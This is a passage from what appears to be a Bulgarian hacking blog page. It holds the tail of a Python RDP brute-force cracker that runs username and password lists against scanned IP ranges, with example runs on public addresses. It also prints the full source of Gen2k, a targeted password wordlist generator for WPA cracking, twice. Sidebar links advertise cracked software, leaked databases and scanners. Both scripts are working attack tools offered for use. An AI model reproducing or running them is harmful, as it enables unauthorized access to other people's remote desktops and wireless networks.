for port in xrange(self.threads):

sock = socket(AF_INET, SOCK_STREAM)

sock.settimeout(self.timeout)

sock.bind((self.host, self.port + port))

sock.listen(1)

self.sockets[sock] = True

# init command template

command = self.command

shellIndex = command.index("telnet {host} {port}")

command[shellIndex] = command[shellIndex].format(host=self.host, port="{port}")

self.pos = [command.index("{user}"), command.index("{password}"),

command.index("{server}"), shellIndex]

attacks = 0

for user in users:

command[self.pos[0]] = user

for password in passwords:

command[self.pos[1]] = password

for server in self.good:

command[self.pos[2]] = server

while active_count() > self.threads:

pass # do not exceed number of threads

attacks += 1

if LIMT and attacks > LIMT:

if self.cli:

print "[!] Limit reached, buy the script."

return

# now call the method in a separate thread

Thread(target=self.crack_server, args=[command[:]]).start()

for server in self.delete: # N^2 can be reduced to NlogN with set

self.good.remove(server) # and also to N with index memorization

self.delete.clear()

while active_count() > 1:

pass # join all

def parse():

at = 1

params = list()

while at < argc:

if argv[at] in ("-h", "--help"):

print usage

exit() # do not start the process

elif argv[at] in ("-v", "--verbose"):

app.set_verbose(True)

elif argv[at] in ("-t", "--threads"):

at += 1

app.set_threads(int(argv[at]))

elif argv[at] in ("-T", "--timeout"):

at += 1

app.set_timeout(float(argv[at]))

elif argv[at] in ("-m", "--method"):

at += 1

app.set_method(argv[at])

elif argv[at] in ("-w", "--working"):

at += 1

app.set_working(argv[at])

elif argv[at] in ("-c", "--cracked"):

at += 1

app.set_cracked(argv[at])

elif argv[at] in ("-s", "--safe-off"):

app.set_safe(False)

elif argv[at] in ("-n", "--no-scan"):

app.set_switch(False)

else:

if argv[at][0] == "-":

raise Exception("Invalid option")

params.append(argv[at])

at += 1

pLen = len(params)

if pLen not in (2, 3):

raise Exception("Invalid number of parameters")

app.set_srv(params[-1])

app.set_pwd(params[-2])

if pLen == 3:

app.set_usr(params[-3]) # same index as 0

def main():

try:

if argc == 1:

# show a message or start the GUI which is missing :)

print "You should run: %s --help" % argv[0]

exit()

# or parse the arguments

parse()

# and start the scanner

print "[i] Scan phase started."

app.scan() # filter the input for working rdp servers

print "[i] Crack phase started."

app.crack() # crack them

except Exception as excp:

print "[x] Error: %s." % excp

except KeyboardInterrupt:

print "[!] Stopped."

else:

print "[i] Finished."

if __name__ == "__main__":

argc = len(argv)

usage = """

Usage: {0} [options] [usr] pwd srv

Options:

-t, --threads <number> number of threads (parallel connections)

-s, --safe-off by default the number of threads is reduced

to the number of working servers if it's greater

use this option to keep the number of threads

-T, --timeout <seconds> waiting response time for each connection

-m, --method <r/x> use [r]desktop or [x]freerdp

-w, --working <file> file used to store servers with 3389 opened

-c, --cracked <file> file used to store cracked servers

-n, --no-scan skip scan phase asumming all servers are working rdps

-v, --verbose show extra information (default off)

-h, --help show this help

Parameters:

usr users file (default users: {1})

pwd passwords file

srv servers file or range (abc.def.ghi.jkl-mno.pqr.stu.vwx)

Examples:

{0} -c cracked.txt passwords.txt 68.195.205.60-68.195.211.60

{0} -w good.txt --timeout 2 -s pass.txt 91.202.91.119-91.202.94.15

{0} -t 256 -T 5 -v -c cracked.txt -n users.txt pass.txt good.txt

Users, passwords and working servers are loaded into memory.

Be aware to not open a file for both read and write. More exactly do not use

the same file name with `-w`/`-c` and `srv`.

THIS SCRIPT IS INTENDED FOR PERSONAL AND LIMITED PURPOSES ONLY

I AM NOT RESPONSIBLE FOR ANY LEGAL OR ILLEGAL USE OF THIS PROGRAM

Send bugs to cmin764@yahoo/gmail.com.

""".format(argv[0], USER)

app = Engine(THRD, TOUT, HOST, PORT, RDP1, RDP2, VERB, METH, USER, SAFE, SWTC)

main()

del app

Скриптове

8 мар., 2016

[Python]Gen2k [Automated Word List Generator]

#!/usr/bin/env python

__author__    = 'irenicus09'
__email__     = 'irenicus09[at]gmail[dot]com'
__license__   = 'BSD'
__version__   = 'BETA'
__date__      = '18/05/2013'

import sys

"""
##############################  GEN2K  ####################################

Automated Word List Generator

> Generates passwords combinations by combining words from wordlist.
> Covers frequently used number patterns used along with words.
> Generates passwords combinations using year/date combo.
> Generates custom user defined value(s) combination with word list.
> Option to auto convert words to upper/lowercase & capitalisation.
> WPA/WPA2 password validation check.
> No external dependencies.

---------------------------------------------------------------------------

HINTS:

* DO NOT USE A GENERAL PURPOSE WORDLIST
  * SUPPLIED WORDLIST MUST ONLY CONTAIN KNOWN FACTS ABOUT TARGET
    E.G NAMES, ADDRESS, FAVORITE ARTIST, PLACE, EVENT, ETC.
  * TRY TO KEEP WORDLIST AT A MINIMUM, DON'T INCLUDE TOO MUCH DETAILS
  * THE FINAL GENERATED WORD LIST CAN GET EXTREMELY LARGE!

###########################################################################
"""

def help():
    print """

######   ######## ##    ##  #######  ##    ##
        ##    ##  ##       ###   ## ##     ## ##   ##
        ##        ##       ####  ##        ## ##  ##
        ##   #### ######   ## ## ##  #######  #####
        ##    ##  ##       ##  #### ##        ##  ##
        ##    ##  ##       ##   ### ##        ##   ##
         ######   ######## ##    ## ######### ##    ##  %s

======= Automated Word List Generator =======

USAGE: ./gen2k.py -w <wordlist> -o <output> [options]

[ -c ] Enable word combination among the words in wordlist.

[ -d ] Custom comma separated values to combine with wordlist.

[ -e ] Enable wpa/wpa2 fitness check for generated passwords.

[ -h ] Prints this help.

[ -n ] Enable frequently used number combination with wordlist.

[ -o ] Output filename.

[ -w ] Path to word list file.
           Wordlist must contain info related to Target.

[ -y ] Enable year combination with wordlist.

[ -z ] Enable conversion of words to upper & lower case letters.

Note: Conversion to upper/lowercase & capitalisation
           takes place before other modes are applied to the original list.

""" % __version__

def main():

if exist('-h'):
        help()
        sys.exit(0)

if not (exist('-w') or exist('-o')):
        help()
        sys.exit(1)

master_list = load_words(find('-w')) # List supplied by user

data = [] # Final wordlist
    temp = [] # Temporary wordlist

if exist('-z'):
        master_list = gen_case(master_list)
        data = master_list

if exist('-c'):
        temp = gen_word_combo(master_list)
        data = list(set(temp+data))

if exist('-n'):
        temp = gen_numbers(master_list)
        data = list(set(temp+data))

if exist('-y'):
        temp = gen_year(master_list)
        data = list(set(temp+data))

if exist('-d'):
        try:
            custom_values = find('-d').split(',')
        except (AttributeError):
            print '[!] Are you kidding me with no values?'
            sys.exit(1)

temp = gen_custom(master_list, custom_values)
        data = list(set(temp+data))

if exist('-e'):
        data = wpa_validation_check(data)

write_file(find('-o'), data)

print '[*] Total words generated: %d' % (len(data))

sys.exit(0)

def merge_list(temp_list=[], final_list=[]):
    """
    Merges contents from temp_list (1st param) with final_list (2nd param)
    """
    for word in temp_list:
        if word not in final_list:
            final_list.append(word)

def load_words(path_to_file):
    """
    Function to fetch all possible words.
    """
    data = []

try:
        handle = open(path_to_file, 'r')
        temp_list = handle.readlines()
        handle.close()

except(BaseException):
        print '[!] Error occured while reading wordlist.'
        sys.exit(1)

for word in temp_list:
        word = word.strip()
        if word != '':
            data.append(word)

return data

def write_file(path_to_file, data=[]):
    """
    Writing to specified file.
    """
    try:
        handle = open(path_to_file, 'wb+')

for word in data:
            handle.write(word+'\n')

handle.close()
    except(BaseException):
        print '[!] Error occured while writing to file.'
        sys.exit(1)

def gen_case(words=[]):
    """
    Function to change words to Upper & Lower case.
    """
    custom_list = []

for x in words:
        custom_list.append(x.lower())
        custom_list.append(x.capitalize())
        custom_list.append(x.upper())

return list(set(custom_list))

def gen_numbers(words=[]):
    """
    Function to mix words with commonly used numbers patterns.
    """
    word_list = []

if len(words) <= 0:
        return word_list

num_list = ['0', '01', '012', '0123', '01234', '012345', '0123456', '01234567', '012345678', '0123456789',
    '1', '12', '123', '1234','12345', '123456','1234567','12345678','123456789', '1234567890', '9876543210',
    '987654321', '87654321', '7654321', '654321', '54321', '4321', '321', '21']

for word in words:
        for num in num_list:
            word_list.append((word+num))
            word_list.append((num+word))

return word_list

def gen_year(words=[]):
    """
    Function to mix auto generated year with words from wordlist.

Hint: Date of birth & special dates are often
          combined with certain words to form
          passwords.
    """
    word_list = []

if len(words) <= 0:
        return word_list

# Double digit dates
    start = 1
    while(start <= 99):
        for word in words:
            word_list.append(word + str("%02d") % (start))
            word_list.append(str("%02d") % start + word)
        start += 1

# Four digit dates
    start = 1900
    while (start <= 2020):
        for word in words:
            word_list.append(word+str(start))
            word_list.append(str(start)+word)
        start += 1

return word_list

def gen_word_combo(words=[]):
    """
    Function to mix multiple words from given list.
    """
    word_list = []

if len(words) <= 1:
        return word_list

for word in words:
        for second_word in words:
            if word != second_word:
                word_list.append(second_word+word)

return word_list

def gen_custom(words=[], data=[]):
    """
    Funtion to combine user defined input with wordlist.

> Takes a comma separated list via cmdline as values.
    """
    word_list = []

if (len(words) <= 0 or len(data) <= 0):
        return word_list

for item in data:
        for word in words:
            word_list.append(item+word)
            word_list.append(word+item)

return word_list

def wpa_validation_check(words=[]):
    """
    Function to optimise wordlist for wpa cracking

> Removes Duplicates.
    > Removes passwords < 8 or > 63 characters in length.
    """
    custom_list =  list(set(words))
    custom_list = [x for x in custom_list if not (len(x) < 8 or len(x) > 63)]

return custom_list

# S3my0n's argument parsers, thx brah :)
def find(flag):
    try:
        a = sys.argv[sys.argv.index(flag)+1]
    except (IndexError, ValueError):
        return None
    else:
        return a

def exist(flag):
    if flag in sys.argv[1:]:
        return True
    else:
        return False

if __name__ == '__main__':
    main()

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

#!/usr/bin/env python

__author__ = 'irenicus09'

__email__ = 'irenicus09[at]gmail[dot]com'

__license__ = 'BSD'

__version__ = 'BETA'

__date__ = '18/05/2013'

import sys

"""

############################## GEN2K ####################################

Automated Word List Generator

> Generates passwords combinations by combining words from wordlist.

> Covers frequently used number patterns used along with words.

> Generates passwords combinations using year/date combo.

> Generates custom user defined value(s) combination with word list.

> Option to auto convert words to upper/lowercase & capitalisation.

> WPA/WPA2 password validation check.

> No external dependencies.

---------------------------------------------------------------------------

HINTS:

* DO NOT USE A GENERAL PURPOSE WORDLIST

* SUPPLIED WORDLIST MUST ONLY CONTAIN KNOWN FACTS ABOUT TARGET

E.G NAMES, ADDRESS, FAVORITE ARTIST, PLACE, EVENT, ETC.

* TRY TO KEEP WORDLIST AT A MINIMUM, DON'T INCLUDE TOO MUCH DETAILS

* THE FINAL GENERATED WORD LIST CAN GET EXTREMELY LARGE!

###########################################################################

"""

def help():

print """

###### ######## ## ## ####### ## ##

## ## ## ### ## ## ## ## ##

## ## #### ## ## ## ##

## #### ###### ## ## ## ####### #####

## ## ## ## #### ## ## ##

## ## ## ## ### ## ## ##

###### ######## ## ## ######### ## ## %s

======= Automated Word List Generator =======

USAGE: ./gen2k.py -w <wordlist> -o <output> [options]

[ -c ] Enable word combination among the words in wordlist.

[ -d ] Custom comma separated values to combine with wordlist.

[ -e ] Enable wpa/wpa2 fitness check for generated passwords.

[ -h ] Prints this help.

[ -n ] Enable frequently used number combination with wordlist.

[ -o ] Output filename.

[ -w ] Path to word list file.

Wordlist must contain info related to Target.

[ -y ] Enable year combination with wordlist.

[ -z ] Enable conversion of words to upper & lower case letters.

Note: Conversion to upper/lowercase & capitalisation

takes place before other modes are applied to the original list.

""" % __version__

def main():

if exist('-h'):

help()

sys.exit(0)

if not (exist('-w') or exist('-o')):

help()

sys.exit(1)

master_list = load_words(find('-w')) # List supplied by user

data = [] # Final wordlist

temp = [] # Temporary wordlist

if exist('-z'):

master_list = gen_case(master_list)

data = master_list

if exist('-c'):

temp = gen_word_combo(master_list)

data = list(set(temp+data))

if exist('-n'):

temp = gen_numbers(master_list)

data = list(set(temp+data))

if exist('-y'):

temp = gen_year(master_list)

data = list(set(temp+data))

if exist('-d'):

try:

custom_values = find('-d').split(',')

except (AttributeError):

print '[!] Are you kidding me with no values?'

sys.exit(1)

temp = gen_custom(master_list, custom_values)

data = list(set(temp+data))

if exist('-e'):

data = wpa_validation_check(data)

write_file(find('-o'), data)

print '[*] Total words generated: %d' % (len(data))

sys.exit(0)

def merge_list(temp_list=[], final_list=[]):

"""

Merges contents from temp_list (1st param) with final_list (2nd param)

"""

for word in temp_list:

if word not in final_list:

final_list.append(word)

def load_words(path_to_file):

"""

Function to fetch all possible words.

"""

data = []

try:

handle = open(path_to_file, 'r')

temp_list = handle.readlines()

handle.close()

except(BaseException):

print '[!] Error occured while reading wordlist.'

sys.exit(1)

for word in temp_list:

word = word.strip()

if word != '':

data.append(word)

return data

def write_file(path_to_file, data=[]):

"""

Writing to specified file.

"""

try:

handle = open(path_to_file, 'wb+')

for word in data:

handle.write(word+'\n')

handle.close()

except(BaseException):

print '[!] Error occured while writing to file.'

sys.exit(1)

def gen_case(words=[]):

"""

Function to change words to Upper & Lower case.

"""

custom_list = []

for x in words:

custom_list.append(x.lower())

custom_list.append(x.capitalize())

custom_list.append(x.upper())

return list(set(custom_list))

def gen_numbers(words=[]):

"""

Function to mix words with commonly used numbers patterns.

"""

word_list = []

if len(words) <= 0:

return word_list

num_list = ['0', '01', '012', '0123', '01234', '012345', '0123456', '01234567', '012345678', '0123456789',

'1', '12', '123', '1234','12345', '123456','1234567','12345678','123456789', '1234567890', '9876543210',

'987654321', '87654321', '7654321', '654321', '54321', '4321', '321', '21']

for word in words:

for num in num_list:

word_list.append((word+num))

word_list.append((num+word))

return word_list

def gen_year(words=[]):

"""

Function to mix auto generated year with words from wordlist.

Hint: Date of birth & special dates are often

combined with certain words to form

passwords.

"""

word_list = []

if len(words) <= 0:

return word_list

# Double digit dates

start = 1

while(start <= 99):

for word in words:

word_list.append(word + str("%02d") % (start))

word_list.append(str("%02d") % start + word)

start += 1

# Four digit dates

start = 1900

while (start <= 2020):

for word in words:

word_list.append(word+str(start))

word_list.append(str(start)+word)

start += 1

return word_list

def gen_word_combo(words=[]):

"""

Function to mix multiple words from given list.

"""

word_list = []

if len(words) <= 1:

return word_list

for word in words:

for second_word in words:

if word != second_word:

word_list.append(second_word+word)

return word_list

def gen_custom(words=[], data=[]):

"""

Funtion to combine user defined input with wordlist.

> Takes a comma separated list via cmdline as values.

"""

word_list = []

if (len(words) <= 0 or len(data) <= 0):

return word_list

for item in data:

for word in words:

word_list.append(item+word)

word_list.append(word+item)

return word_list

def wpa_validation_check(words=[]):

"""

Function to optimise wordlist for wpa cracking

> Removes Duplicates.

> Removes passwords < 8 or > 63 characters in length.

"""

custom_list = list(set(words))

custom_list = [x for x in custom_list if not (len(x) < 8 or len(x) > 63)]

return custom_list

# S3my0n's argument parsers, thx brah :)

def find(flag):

try:

a = sys.argv[sys.argv.index(flag)+1]

except (IndexError, ValueError):

return None

else:

return a

def exist(flag):

if flag in sys.argv[1:]:

return True

else:

return False

if __name__ == '__main__':

main()

Category: Сигурност

WordPress Vulnerability Scan

Acunetix Web Vulnerability Scanner 8 Full + Crack [Tested]

Darkjumper- Автоматизиран инструмент и урок

Изтекли бази данни в интернет!

WPA WPA2 Word List – 982,963,904 Думи

[FIX][RDP]Terminal Server has exceeded max number of connections

[PHP]phpMyAdmin Scanner v2

[Python] vnc_scan.py

[Python] RDP Brute

[Python]Gen2k [Automated Word List Generator]

Editor Picks

WordPress Vulnerability Scan

Acunetix Web Vulnerability Scanner 8 Full + Crack [Tested]

Languages